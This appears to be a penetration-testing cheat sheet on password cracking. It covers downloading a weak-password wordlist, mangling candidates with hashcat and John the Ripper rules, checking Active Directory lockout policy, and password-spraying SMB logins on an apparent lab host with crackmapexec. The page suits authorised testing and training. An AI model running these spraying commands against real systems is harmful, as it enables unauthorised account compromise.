Password Cracking
Infra password cracking - Build your own wordlist that fits
Take a wordlist
for example staticticaly meaningful
wget https://raw.githubusercontent.com/insidetrust/statistically-likely-
usernames/master/weak-corporate-passwords/english-basic.txt
cat users.txt >> english-basic.txtor build your own based on user enumeration (SMB, RPC, WEB)
Building Yp Own Passowrd Wordlist
usernames including admins
seasons
password
<empty>Rules Mangling with
Enrich your wordlist by rules, add a bit of that, reverse, mangle...
hashcat
hashcat --force --stdout -r /usr/share/hashcat/rules/best64.rule password.listJohn The Ripper
john hashes --wordlist=mywordlist --rules=MyRuleSetwhere rule file /etc/john/john.conf
[List.Rules:MyRuleSet]
Az"[0-9][0-9][0-9][0-9]"
[List.Rules:Toggle]
T0
T1
T2
T0T1
T1T2
T0T2
T0T1T2
[List.Rules:Double]
d
p5
[List.Rules:Reflect]
f
[List.Rules:Reverse]
r
Now you have a wordlists that fits, be prepared for online password attack by checking...
Account Policy
Determine the account policy on your infra Active Directory before you start to lock out accounts
crackmapexec smb 10.129.228.111 --pass-polStart to crack with
Crackmapexec smb
# usernames only
crackmapexec smb 10.129.228.111 -u ./users.txt -p ./users.txt --continue-on-success
# with custom pass list
crackmapexec smb 10.129.228.111 -u users.txt -p pass.lstLast updated
Was this helpful?